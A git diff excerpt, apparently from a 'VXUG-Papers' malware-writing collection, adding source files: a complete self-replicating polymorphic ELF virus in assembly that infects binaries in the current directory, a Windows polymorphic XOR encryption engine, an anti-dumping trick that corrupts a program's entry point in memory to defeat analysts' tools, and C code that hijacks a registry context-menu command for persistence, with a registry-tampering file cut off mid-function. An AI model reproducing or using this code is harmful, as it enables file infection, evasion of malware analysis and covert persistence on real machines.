|
|||
;####################################
|
||||
;## A 32 bit Polymorphic ELF virus ##
|
||||
;## By S01den ##
|
||||
;####################################
|
||||
|
||||
; .____ .__ ________ ________ __________ .___.__
|
||||
; | | |__| ____ \_____ \ \_____ \ \______ \_______ ____ __ __ __| _/| |__ ____ ____
|
||||
; | | | |/ \ _(__ < / ____/ | ___/\_ __ \/ _ \| | \/ __ | | | \ / _ \ / \
|
||||
; | |___| | | \/ \/ \ | | | | \( <_> ) | / /_/ | | Y ( <_> ) | \
|
||||
; |_______ \__|___| /______ /\_______ \ /\ |____| |__| \____/|____/\____ | |___| /\____/|___| /
|
||||
; \/ \/ \/ \/ \/ \/ \/ \/
|
||||
|
||||
; Infection through segment padding infection + polymorphism. Made with love by S01den
|
||||
; Can only infect binary with an executable stack, because polymorphism routine operates on the stakc...
|
||||
; The encryption is just a simple xor, with a random key generated with a Linear Congruential Generator (LCG) for every new infection.
|
||||
|
||||
;#################################### USEFUL LINKS ####################################
|
||||
;# http://ivanlef0u.fr/repo/madchat/vxdevl/vxsrc/Linux/Linux.Cyneox/Linux.Cyneox.asm #
|
||||
;# http://ivanlef0u.fr/repo/madchat/vxdevl/vxsrc/Linux/Linux.Binom/Linux.Binom.asm #
|
||||
;# http://shell-storm.org/shellcode/files/syscalls.html #
|
||||
;######################################################################################
|
||||
|
||||
;nasm -f elf32 proudhon.asm && ld -m elf_i386 proudhon.o -o proudhon
|
||||
|
||||
;---------------------------------- CUT HERE ----------------------------------
|
||||
|
||||
; thoses variables concern the virus body, not the decipher loop
|
||||
|
||||
%define VIRSIZE 803
|
||||
%define SIZE_DECIPHER 0x35
|
||||
%define DELTA_CODE 0x2f1
|
||||
%define RET_OEP VIRSIZE+SIZE_DECIPHER+3
|
||||
|
||||
; variables for the linear congruential generator (to generate a random key)
|
||||
; same as C++11's minstd_rand
|
||||
|
||||
%define a_lcg 48271
|
||||
%define modulus_lcg 0x7fffffff
|
||||
|
||||
section .text
|
||||
global _start
|
||||
|
||||
_start:
|
||||
|
||||
mov ecx, VIRSIZE
|
||||
add ecx, 0x3f ; SIZE_DECIPHER+9
|
||||
loop:
|
||||
call get_eip
|
||||
sub eax, 0xd
|
||||
mov esi, eax
|
||||
mov al, byte [esi+ecx-1]
|
||||
cmp ecx, 0x352 ; because the code to jump into the OEP have to be plain
|
||||
jae set_byte
|
||||
cmp ecx, SIZE_DECIPHER ; because this routine and get_eip have to be plain
|
||||
jbe set_byte
|
||||
xor al ,0x00
|
||||
set_byte:
|
||||
mov byte [esp+ecx-1], al
|
||||
dec ecx
|
||||
jnz loop
|
||||
add esp, SIZE_DECIPHER
|
||||
jmp esp
|
||||
|
||||
get_eip:
|
||||
mov eax, [esp]
|
||||
ret
|
||||
|
||||
vx:
|
||||
add esp, VIRSIZE
|
||||
add esp, SIZE_DECIPHER
|
||||
xor eax, eax
|
||||
xor ebx, ebx
|
||||
xor ecx, ecx
|
||||
xor edx, edx
|
||||
|
||||
mov edx, VIRSIZE
|
||||
push edx ; push the len of the virus on the stack
|
||||
add esp, 0x20
|
||||
|
||||
getFiles:
|
||||
mov eax,183 ; pwd
|
||||
mov ebx,esp
|
||||
mov ecx,128
|
||||
int 0x80
|
||||
|
||||
mov eax, 5 ; open
|
||||
mov ecx, 0
|
||||
mov edx, 0
|
||||
int 0x80
|
||||
|
||||
cmp eax, 0
|
||||
jl exit
|
||||
|
||||
mov ebx, eax ; getdents
|
||||
mov eax, 141
|
||||
mov edx, 1024
|
||||
|
||||
push esp
|
||||
mov ecx, [esp] ; a little trick to save a spot on the stack
|
||||
|
||||
int 0x80
|
||||
|
||||
mov eax, 6 ; close
|
||||
int 0x80
|
||||
|
||||
mov esp, ecx
|
||||
xor edi, edi
|
||||
xor ecx, ecx
|
||||
xor ebx, ebx
|
||||
mov esi, edx
|
||||
xor edx, edx
|
||||
|
||||
parse_dir: ; a dump trick to get filenames from the previous getdents
|
||||
inc esp
|
||||
xor eax, eax
|
||||
cmp byte [esp], 0x00
|
||||
jne not_zero
|
||||
cmp ecx, 2 ; if there are more than two successive printable bytes followed by a null byte, we consider the string a filename
|
||||
ja infect ; so we try to infect it.
|
||||
|
||||
not_zero:
|
||||
mov bl, byte [esp]
|
||||
cmp bl, 0x20 ; check if the byte is printable
|
||||
jbe not_filename
|
||||
cmp bl, 0x7e
|
||||
jae not_filename
|
||||
inc ecx
|
||||
|
||||
keep_parsing:
|
||||
inc edi
|
||||
cmp edi, 0x150
|
||||
jae exit
|
||||
jmp parse_dir
|
||||
|
||||
not_filename:
|
||||
xor ebx, ebx
|
||||
xor ecx, ecx
|
||||
jmp keep_parsing
|
||||
|
||||
infect:
|
||||
mov ebx, ecx
|
||||
sub esp, ecx
|
||||
|
||||
setFileName:
|
||||
mov eax, 5 ; open
|
||||
mov ebx, esp
|
||||
push ebp
|
||||
mov ebp, ecx
|
||||
mov ecx, 2 ; O_RW
|
||||
xor edx, edx
|
||||
int 0x80
|
||||
cmp eax, 0
|
||||
jl restore_esp
|
||||
|
||||
push eax
|
||||
push eax
|
||||
|
||||
stat:
|
||||
; to get the length of the file to infect
|
||||
mov eax,106 ; SYS_STAT
|
||||
sub esp,64
|
||||
mov ecx,esp
|
||||
int 0x80
|
||||
|
||||
mov edx,[esp+20] ; edx = len of file to infect
|
||||
add esp,64
|
||||
|
||||
pop ebx
|
||||
push edx
|
||||
add esp, 0x400
|
||||
mov eax, 3 ; read
|
||||
mov ecx, esp ; the stack now contains the whole content of the file we try to infect
|
||||
int 0x80
|
||||
|
||||
cmp eax, 0
|
||||
jl parse_dir
|
||||
|
||||
parse_file:
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
add esp, 0xc
|
||||
get_magic:
|
||||
cmp dword [esp], 0x464c457f ; check if the file is an ELF
|
||||
je get_signature
|
||||
sub esp, 0x3f4
|
||||
call close
|
||||
call clean
|
||||
jmp parse_dir
|
||||
|
||||
get_signature:
|
||||
xor ecx, ecx
|
||||
mov cx, word [esp+0x18] ; get e_phnum "Contains the number of entries in the program header table. "
|
||||
mov eax, dword [esp+0x1C] ; get e_phoff "Points to the start of the program header table." (which contains the segments infos)
|
||||
|
||||
; for segment padding infection, we look at the space between the text and the data segment
|
||||
mov ecx,[esp+eax+0x20*3+8] ; get data vaddr
|
||||
mov ebx,[esp+eax+0x20*2+16] ; get text size
|
||||
mov eax,[esp+eax+0x20*2+8] ; get text vaddr
|
||||
add ebx, eax ; ebx = text.vaddr+text.filesz
|
||||
sub ecx,ebx ; data.p_vaddr - (text.p_filesz + text.p_vaddr)
|
||||
|
||||
mov eax,VIRSIZE
|
||||
cmp eax, ecx
|
||||
ja no_room
|
||||
|
||||
mov eax,[esp+0x18] ;get entry point
|
||||
push eax
|
||||
|
||||
add ebx, 15
|
||||
mov eax, dword [esp+0x1C+4]
|
||||
mov eax,[esp+eax+0x20*2+8+4]
|
||||
mov [esp+0x18+4], ebx ; write the new EP (new entrypoint = text.p_filesz + text.p_vaddr)
|
||||
sub ebx, eax ; get the offset of the new EP
|
||||
mov eax, ebx
|
||||
push eax
|
||||
|
||||
add esp, eax
|
||||
mov esi, eax
|
||||
cmp dword [esp+7], 0x323b900 ; check if the bytes at the entry point are the same as in every file infected (0x323b900 = mov ecx,VIRSIZE). It's kind of a signature.
|
||||
je already_infected
|
||||
|
||||
; we put on the stack the code to return to the OEP
|
||||
mov byte [esp], 0xbd ; -
|
||||
sub esp, eax ; | - Get the OEP from the stack and put it into ECX
|
||||
pop ebx ; | |
|
||||
pop ecx ; | |
|
||||
push ebx ; | |
|
||||
add esp, eax ; | |
|
||||
sub esp, 4 ; | -
|
||||
mov [esp+1], ecx ; - mov ebp, OEP
|
||||
mov word [esp+5],0xe5ff ; jmp ebp
|
||||
|
||||
writeVirus:
|
||||
;####### insert the code to restore the OEP #######
|
||||
xor edx, edx
|
||||
mov ebx, 3
|
||||
mov ecx, eax
|
||||
mov eax, RET_OEP
|
||||
add ecx, eax
|
||||
mov eax, 19 ; lseek
|
||||
int 0x80
|
||||
|
||||
mov ecx, esp
|
||||
mov eax, 4 ; write
|
||||
mov edx, 7
|
||||
int 0x80
|
||||
|
||||
;####### write the new EP #######
|
||||
xor edx, edx
|
||||
mov ecx, 0x18
|
||||
mov eax, 19
|
||||
int 0x80
|
||||
|
||||
add esp, 8
|
||||
sub esp, esi
|
||||
mov ecx, esp
|
||||
add ecx, 0x18
|
||||
mov edx, 4
|
||||
mov eax, 4
|
||||
int 0x80
|
||||
|
||||
;####### write the virus #######
|
||||
mov ebx, 3
|
||||
xor edx, edx
|
||||
mov ecx, esi
|
||||
mov eax, 19
|
||||
int 0x80
|
||||
|
||||
call get_eip
|
||||
mov bl, byte [eax-0x1e2] ; get the current key
|
||||
push eax
|
||||
xor eax, eax
|
||||
mov al, bl
|
||||
|
||||
; Linear Congruential Generator (I use this algorithm because it's an easy way to generate entropy)
|
||||
lcg:
|
||||
inc al
|
||||
inc al
|
||||
mov ecx, a_lcg
|
||||
mul eax
|
||||
xor edx, edx
|
||||
mov ebx, modulus_lcg
|
||||
div ebx
|
||||
|
||||
pop eax
|
||||
mov byte [eax-0x1e2], dl
|
||||
; edx now contains the remainder of the operation (X_n+1 = (aX_n+c) % modulus), so edx is the new key
|
||||
|
||||
call clean
|
||||
|
||||
get_decipher: ; get the decipher routine (which contains the new key)
|
||||
call get_eip
|
||||
sub eax, 0x236
|
||||
mov cl, byte [eax+ebx]
|
||||
mov byte [esp+ebx], cl
|
||||
inc ebx
|
||||
cmp ebx, SIZE_DECIPHER
|
||||
jne get_decipher
|
||||
|
||||
call clean
|
||||
jmp getVirus
|
||||
|
||||
write_vx_code:
|
||||
call clean
|
||||
|
||||
mov bl, byte [esp+0x24] ; get the key
|
||||
mov edx, VIRSIZE
|
||||
encrypt: ; encrypt the virus body with the new key
|
||||
mov cl, byte [esp+SIZE_DECIPHER+eax]
|
||||
xor ecx, ebx
|
||||
mov byte [esp+SIZE_DECIPHER+eax], cl
|
||||
inc eax
|
||||
cmp eax, edx
|
||||
jne encrypt
|
||||
|
||||
mov ecx, esp
|
||||
mov ebx, 3
|
||||
mov edx, VIRSIZE
|
||||
add edx, SIZE_DECIPHER
|
||||
mov eax, 4
|
||||
int 0x80
|
||||
|
||||
sub eax, SIZE_DECIPHER
|
||||
cmp eax, VIRSIZE
|
||||
jb exit
|
||||
|
||||
ok_write:
|
||||
sub esp, 0x3f0
|
||||
call close
|
||||
call clean
|
||||
jmp parse_dir
|
||||
|
||||
no_room:
|
||||
sub esp, 0x3ee ; to go back into the getdents content
|
||||
call close
|
||||
call clean
|
||||
jmp parse_dir
|
||||
|
||||
already_infected:
|
||||
sub esp, 0xa55 ; to go back into the getdents content
|
||||
call close
|
||||
call clean
|
||||
jmp parse_dir
|
||||
|
||||
exit:
|
||||
call close
|
||||
call payload
|
||||
call clean
|
||||
call get_eip
|
||||
add eax, 0x7a ; go to the restore OEP code
|
||||
jmp eax
|
||||
|
||||
clean:
|
||||
xor ecx, ecx
|
||||
xor ebx, ebx
|
||||
xor eax, eax
|
||||
xor edx, edx
|
||||
ret
|
||||
|
||||
close:
|
||||
mov eax, 6
|
||||
int 0x80
|
||||
ret
|
||||
|
||||
payload: ; just print a "hey"
|
||||
push 0
|
||||
push 0x796568
|
||||
mov ecx, esp
|
||||
mov eax, 4
|
||||
mov ebx, 1
|
||||
mov edx, 4
|
||||
int 0x80
|
||||
pop ecx
|
||||
pop edx
|
||||
call clean
|
||||
ret
|
||||
|
||||
restore_esp:
|
||||
add esp, ebp
|
||||
pop ebp
|
||||
jmp parse_dir
|
||||
|
||||
getVirus: ; a simple method I found which permits to get the whole virus code thanks to the current EIP
|
||||
call get_eip
|
||||
sub eax, DELTA_CODE
|
||||
mov cl, byte [eax+ebx]
|
||||
mov byte [esp+SIZE_DECIPHER+ebx], cl
|
||||
inc ebx
|
||||
cmp ebx, VIRSIZE
|
||||
jne getVirus
|
||||
call clean
|
||||
jmp write_vx_code
|
||||
|
||||
;--------------------------------------------------------------------------------------------------------------------------
|
105
VXUG-Papers/Mocoh Polymorphic Engine.asm
Normal file
105
VXUG-Papers/Mocoh Polymorphic Engine.asm
Normal file
|
@ -0,0 +1,105 @@
|
|||
; .__
|
||||
; _____ ____ ____ ____ | |__
|
||||
; / \ / _ \_/ ___\/ _ \| | \ Poly Engine
|
||||
;| Y Y ( <_> ) \__( <_> ) Y \
|
||||
;|__|_| /\____/ \___ >____/|___| /
|
||||
; \/ \/ \/
|
||||
;
|
||||
; [+] Simple Polymorphic PoC (code and decrypt routine)
|
||||
; [+] 1byte XOR random key
|
||||
; [+] The engine can change the key, and some instructions (code and order)
|
||||
; [+] This is not new, not advanced... Just for education purposes
|
||||
;
|
||||
; By: SWaNk 2019 - Back in business, VX forever!
|
||||
;
|
||||
;https://pt.wikipedia.org/wiki/Mocó (Kerodon rupestris)
|
||||
|
||||
format PE GUI 4.0
|
||||
entry start
|
||||
|
||||
include "%include%/win32a.inc"
|
||||
|
||||
; This is the poly encryption macro (1 byte xor).
|
||||
; It is a simple XOR random 0x00 to 0xFF at compilation time.
|
||||
;This is just a example how this can be done... Use your imagination to improve
|
||||
|
||||
macro encrypt dstart,dsize {
|
||||
local ..char
|
||||
|
||||
key = %t and 0xff
|
||||
|
||||
repeat dsize
|
||||
load ..char from dstart+%-1
|
||||
..char = ..char xor key
|
||||
store ..char at dstart+%-1
|
||||
end repeat
|
||||
}
|
||||
|
||||
;The idea was to create a didactic macro. this guy will split the 1 byte range in 2 (0xff / 2 = 0x7f)
|
||||
;
|
||||
;If the pseudo random key is bigger than 0x7f, edx will receive the real_start then ecx will receive
|
||||
;the code_size. if the key is smaller than 0x7f, the order chage
|
||||
;
|
||||
;If the pseudo random key is bigger than 0x7f, the increase of edx will be made with "inc edx" otherwise
|
||||
;with "add edx, 1"
|
||||
|
||||
macro simplePoly {
|
||||
if key > 0x7f
|
||||
mov edx,real_start
|
||||
mov ecx,code_size
|
||||
else
|
||||
mov ecx,code_size
|
||||
mov edx,real_start
|
||||
end if
|
||||
|
||||
@@: xor byte [edx],key
|
||||
|
||||
if key > 0x7f
|
||||
inc edx
|
||||
else
|
||||
add edx,1
|
||||
end if
|
||||
|
||||
loop @B
|
||||
}
|
||||
|
||||
;this macro will generate this instructions starting at the entry point
|
||||
|
||||
; mov edx,mocoh.401010 | The order of this instructions
|
||||
; mov ecx,1C | can change
|
||||
|
||||
; xor byte ptr ds:[edx],F4 | The key will change (this case is F4)
|
||||
; inc edx | This can change to "add edx, 1"
|
||||
; loop mocoh.40100A
|
||||
|
||||
;============================================================
|
||||
section ".code" code readable writeable
|
||||
;============================================================
|
||||
start:
|
||||
|
||||
simplePoly
|
||||
|
||||
real_start:
|
||||
|
||||
; Add your code here, start of encrypted code
|
||||
|
||||
stdcall [MessageBox],0,msg,title,MB_ICONASTERISK
|
||||
stdcall [ExitProcess],0
|
||||
|
||||
; end of encrypted code
|
||||
|
||||
|
||||
display "Encrypting this shit... "
|
||||
code_size = $ - real_start
|
||||
encrypt real_start,code_size
|
||||
display "done",13,10
|
||||
|
||||
;============================================================
|
||||
section ".data" data readable writeable import
|
||||
;============================================================
|
||||
library kernel32,"kernel32.dll",user32,"user32.dll"
|
||||
include "%include%/api/kernel32.inc"
|
||||
include "%include%/api/user32.inc"
|
||||
|
||||
title db "SWaNk 2019",0
|
||||
msg db "compile 2 times and compare the hashes and decryption instruction bitches!",0
|
112
VXUG-Papers/The Fake Entry Point Trick.txt
Normal file
112
VXUG-Papers/The Fake Entry Point Trick.txt
Normal file
|
@ -0,0 +1,112 @@
|
|||
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
; Fake EP trick
|
||||
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
; The idea is simple: After loading our program, we change the loaded PE image entry point
|
||||
; dynamically to another routine inside our code (In this example is a simple messagebox).
|
||||
;
|
||||
; So, when the reverse guy dumps it will get the changed EP and change the PE behaviour
|
||||
; when the dumped file run. This is just an educational trick with PE headers for my
|
||||
; students understand better the PE Format in a practical way on malware analysis classes.
|
||||
;
|
||||
; This trick defeats:
|
||||
; - Process Dump v2.1 (https://github.com/glmcdona/Process-Dump)
|
||||
; - OllyDumpEx
|
||||
; - Every dumper that grabs info from loaded PE header
|
||||
;
|
||||
; We move the file location to defeat Scylla too.
|
||||
;
|
||||
; SWaNk 2020 - VX
|
||||
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
|
||||
format PE GUI 4.0
|
||||
|
||||
entry start
|
||||
|
||||
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
; includes
|
||||
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
include '%fasm%\INCLUDE\win32a.inc'
|
||||
|
||||
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
section '.text' code readable writeable executable
|
||||
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
; if the file was dumped from memory, with one tool that grab the loaded image,
|
||||
; the EP will chage to this instruction
|
||||
push 0
|
||||
push szTitle
|
||||
push szFuckOff
|
||||
push 0
|
||||
call [MessageBoxA]
|
||||
|
||||
push 0
|
||||
call [ExitProcess]
|
||||
|
||||
start:
|
||||
invoke GetModuleHandleA, 0 ;get imageBase
|
||||
mov [mHandle], eax
|
||||
|
||||
mov ebx, eax ;save into ebx
|
||||
add ebx, 0xa8 ;EP
|
||||
|
||||
invoke VirtualProtect, ebx, 4, PAGE_EXECUTE_READWRITE, Old
|
||||
mov byte[ebx], 0x00 ;Change EP to our joke payload
|
||||
invoke VirtualProtect, ebx, 4, PAGE_EXECUTE_READ, Old
|
||||
|
||||
;Now we rename the file so Scylla can't find it on disk (MoveFileA)
|
||||
|
||||
invoke GetModuleFileNameA,0,szfileName, 255 ; return length in eax
|
||||
add eax, szfileName ; eax now is in the end of the PE filename
|
||||
|
||||
;Find for the first '\' from backwards to grab the filename
|
||||
@@:
|
||||
dec eax
|
||||
cmp byte[eax],'\'
|
||||
jne @B
|
||||
inc eax ;skip slash
|
||||
mov ebx, eax ;save to rename file back
|
||||
|
||||
invoke MoveFileA, eax, tmpName, NULL
|
||||
|
||||
;normal behaviour, just a messagebox, if the file is dumped here the trap is set
|
||||
push 0
|
||||
push szTitle
|
||||
push szExample
|
||||
push 0
|
||||
call [MessageBoxA]
|
||||
|
||||
;rename to the original name
|
||||
|
||||
invoke MoveFileA, tmpName, ebx, NULL
|
||||
|
||||
push 0
|
||||
call [ExitProcess]
|
||||
|
||||
error:
|
||||
push 0
|
||||
call [ExitProcess]
|
||||
|
||||
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
section '.data' data readable writeable
|
||||
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
|
||||
szExample db 'Original file',0
|
||||
szFuckOff db 'Hands off asshole',0
|
||||
szTitle db 'Fake EP trick',0
|
||||
mHandle dd ?
|
||||
szfileName rb 250
|
||||
tmpName db "1.exe",0
|
||||
Old dd ?
|
||||
|
||||
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
data import
|
||||
library kernel,'KERNEL32.DLL',\
|
||||
user32,'USER32.DLL'
|
||||
|
||||
import user32, MessageBoxA,'MessageBoxA'
|
||||
import kernel, ExitProcess,'ExitProcess',\
|
||||
GetModuleHandleA,'GetModuleHandleA',\
|
||||
GetModuleFileNameA,'GetModuleFileNameA',\
|
||||
MoveFileA,'MoveFileA',\
|
||||
VirtualProtect,'VirtualProtect'
|
||||
|
||||
end data
|
|
@ -0,0 +1,200 @@
|
|||
#include <windows.h>
|
||||
#include <Psapi.h>
|
||||
#include <stdio.h>
|
||||
|
||||
#define WCHAR_MAXPATH (MAX_PATH * sizeof(WCHAR))
|
||||
|
||||
DWORD HijackContextMenu(VOID);
|
||||
BOOL DoIExist(VOID);
|
||||
|
||||
int main(VOID)
|
||||
{
|
||||
DWORD dwReturn = ERROR_SUCCESS;
|
||||
dwReturn = HijackContextMenu();
|
||||
|
||||
if (dwReturn != ERROR_SUCCESS && dwReturn != ERROR_FILE_EXISTS)
|
||||
{
|
||||
return dwReturn;
|
||||
}
|
||||
|
||||
if (DoIExist())
|
||||
{
|
||||
MessageBoxA(NULL, "", "", MB_OK);
|
||||
ExitProcess(GetLastError());
|
||||
}
|
||||
|
||||
while (TRUE)
|
||||
{
|
||||
Sleep(1000);
|
||||
}
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL DoIExist(VOID)
|
||||
{
|
||||
DWORD dwProcesses[1024] = { 0 };
|
||||
WCHAR wPath[WCHAR_MAXPATH] = { 0 };
|
||||
DWORD wPathSize = WCHAR_MAXPATH;
|
||||
DWORD dwNeeded = 0;
|
||||
DWORD dwProcess = 0;
|
||||
DWORD dwCount = 0;
|
||||
|
||||
if (!EnumProcesses(dwProcesses, sizeof(dwProcesses), &dwNeeded))
|
||||
{
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
if (GetModuleFileName(NULL, wPath, wPathSize) == 0)
|
||||
{
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
dwProcess = dwNeeded / sizeof(DWORD);
|
||||
for (DWORD dwIndex = 0; dwIndex < dwProcess; dwIndex++)
|
||||
{
|
||||
WCHAR wModule[WCHAR_MAXPATH] = { 0 };
|
||||
if (dwProcesses[dwIndex] != 0)
|
||||
{
|
||||
DWORD dwId = dwProcesses[dwIndex];
|
||||
HANDLE hHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwId);
|
||||
if (hHandle != NULL)
|
||||
{
|
||||
HMODULE hMod;
|
||||
DWORD dwSize;
|
||||
|
||||
if (EnumProcessModules(hHandle, &hMod, sizeof(hMod), &dwSize))
|
||||
{
|
||||
GetModuleBaseName(hHandle, hMod, wModule, (sizeof(wModule) / sizeof(WCHAR)));
|
||||
|
||||
if (wcsstr(wPath, wModule) != NULL)
|
||||
{
|
||||
dwCount++;
|
||||
if (dwCount > 1)
|
||||
{
|
||||
return TRUE;
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
if (hHandle)
|
||||
{
|
||||
CloseHandle(hHandle);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
|
||||
|
||||
DWORD HijackContextMenu(VOID)
|
||||
{
|
||||
HKEY hKey = HKEY_CLASSES_ROOT;
|
||||
WCHAR lpSubKey[WCHAR_MAXPATH] = L"Directory\\Background\\shell";
|
||||
HKEY hOpenKey = NULL;
|
||||
HKEY phkResult;
|
||||
DWORD dwSubKeys;
|
||||
|
||||
if (RegOpenKeyEx(hKey, lpSubKey, 0, KEY_ALL_ACCESS, &phkResult) != ERROR_SUCCESS)
|
||||
{
|
||||
return GetLastError();
|
||||
}
|
||||
|
||||
if (RegQueryInfoKey(phkResult, NULL, NULL, NULL, &dwSubKeys, NULL, NULL, NULL, NULL, NULL, NULL, NULL) != ERROR_SUCCESS)
|
||||
{
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
for (DWORD i = 0; i < dwSubKeys; i++)
|
||||
{
|
||||
DWORD Enum;
|
||||
WCHAR lpName[WCHAR_MAXPATH] = { 0 };
|
||||
WCHAR lpFullName[WCHAR_MAXPATH] = { 0 };
|
||||
DWORD lpcchName = WCHAR_MAXPATH;
|
||||
hOpenKey = 0;
|
||||
WCHAR bValue[WCHAR_MAXPATH] = L"CALC.EXE";
|
||||
WCHAR pvData[2048] = { 0 };
|
||||
WCHAR wModulePath[WCHAR_MAXPATH] = { 0 };
|
||||
|
||||
Enum = RegEnumKeyExW(phkResult, i, lpName, &lpcchName, NULL, NULL, NULL, NULL);
|
||||
|
||||
if (Enum != ERROR_SUCCESS && Enum != ERROR_NO_MORE_ITEMS)
|
||||
{
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
if (wcsstr(lpName, L"TreeSize Free") != NULL)
|
||||
{
|
||||
wcscat(lpName, L"\\command");
|
||||
if (RegOpenKeyEx(phkResult, lpName, 0, KEY_ALL_ACCESS, &hOpenKey) != ERROR_SUCCESS)
|
||||
{
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
Enum = 2048;
|
||||
if (RegGetValue(hOpenKey, NULL, NULL, RRF_RT_REG_SZ, NULL, pvData, &Enum) != ERROR_SUCCESS)
|
||||
{
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
if (GetModuleFileName(NULL, bValue, WCHAR_MAXPATH) == 0)
|
||||
{
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
if (wcscmp(bValue, pvData) == ERROR_SUCCESS)
|
||||
{
|
||||
if (phkResult)
|
||||
{
|
||||
RegCloseKey(phkResult);
|
||||
}
|
||||
|
||||
if (hOpenKey)
|
||||
{
|
||||
RegCloseKey(hOpenKey);
|
||||
}
|
||||
|
||||
return ERROR_FILE_EXISTS;
|
||||
}
|
||||
|
||||
if (RegSetValueEx(hOpenKey, NULL, 0, REG_SZ, (PBYTE)bValue, sizeof(bValue)) != ERROR_SUCCESS)
|
||||
{
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
if (hOpenKey)
|
||||
{
|
||||
RegCloseKey(hOpenKey);
|
||||
}
|
||||
|
||||
break;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
if (phkResult)
|
||||
{
|
||||
RegCloseKey(phkResult);
|
||||
}
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (phkResult)
|
||||
{
|
||||
RegCloseKey(phkResult);
|
||||
}
|
||||
|
||||
if (hOpenKey)
|
||||
{
|
||||
RegCloseKey(hOpenKey);
|
||||
}
|
||||
|
||||
return GetLastError();
|
||||
|
||||
}
|
Binary file not shown.
|
@ -0,0 +1,165 @@
|
|||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
|
||||
#define WCHAR_MAXPATH (MAX_PATH * sizeof(WCHAR))
|
||||
|
||||
DWORD ModifyUninstallString(VOID);
|
||||
|
||||
int main(VOID)
|
||||
{
|
||||
DWORD dwReturn = ERROR_SUCCESS;
|
||||
dwReturn = ModifyUninstallString();
|
||||
|
||||
if (dwReturn != ERROR_SUCCESS && dwReturn != ERROR_FILE_EXISTS)
|
||||
{
|
||||
return dwReturn;
|
||||
}
|
||||
|
||||
|
||||
while (TRUE)
|
||||
{
|
||||
Sleep(1000);
|
||||
}
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
|
||||
|
||||
DWORD ModifyUninstallString(VOID)
|
||||
{
|
||||
HKEY hKey = HKEY_CURRENT_USER;
|
||||
WCHAR lpSubKey[WCHAR_MAXPATH] = L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall";
|
||||
HKEY hOpenKey = NULL;
|
||||
HKEY phkResult;
|
||||
DWORD dwSubKeys;
|
||||
DWORD dwReservedError = ERROR_SUCCESS;
|
||||
PWCHAR lpUninstallString = NULL;
|
||||
|
||||
|
||||
if (RegOpenKeyEx(hKey, lpSubKey, 0, KEY_ALL_ACCESS, &phkResult) != ERROR_SUCCESS)
|
||||
{
|
||||
return GetLastError();
|
||||
}
|
||||
|
||||
if (RegQueryInfoKey(phkResult, NULL, NULL, NULL, &dwSubKeys, NULL, NULL, NULL, NULL, NULL, NULL, NULL) != ERROR_SUCCESS)
|
||||
{
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
for (DWORD i = 0; i < dwSubKeys; i++)
|
||||
{
|
||||
DWORD Enum;
|
||||
WCHAR lpName[WCHAR_MAXPATH] = { 0 };
|
||||
WCHAR lpFullName[WCHAR_MAXPATH] = { 0 };
|
||||
DWORD lpcchName = WCHAR_MAXPATH;
|
||||
hOpenKey = 0;
|
||||
WCHAR bValue[WCHAR_MAXPATH] = { 0 };
|
||||
WCHAR pvData[2048] = { 0 };
|
||||
WCHAR wModulePath[WCHAR_MAXPATH] = { 0 };
|
||||
|
||||
|
||||
Enum = RegEnumKeyExW(phkResult, i, lpName, &lpcchName, NULL, NULL, NULL, NULL);
|
||||
|
||||
if (Enum != ERROR_SUCCESS && Enum != ERROR_NO_MORE_ITEMS)
|
||||
{
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
if (wcsstr(lpName, L"wire") != NULL)
|
||||
{
|
||||
|
||||
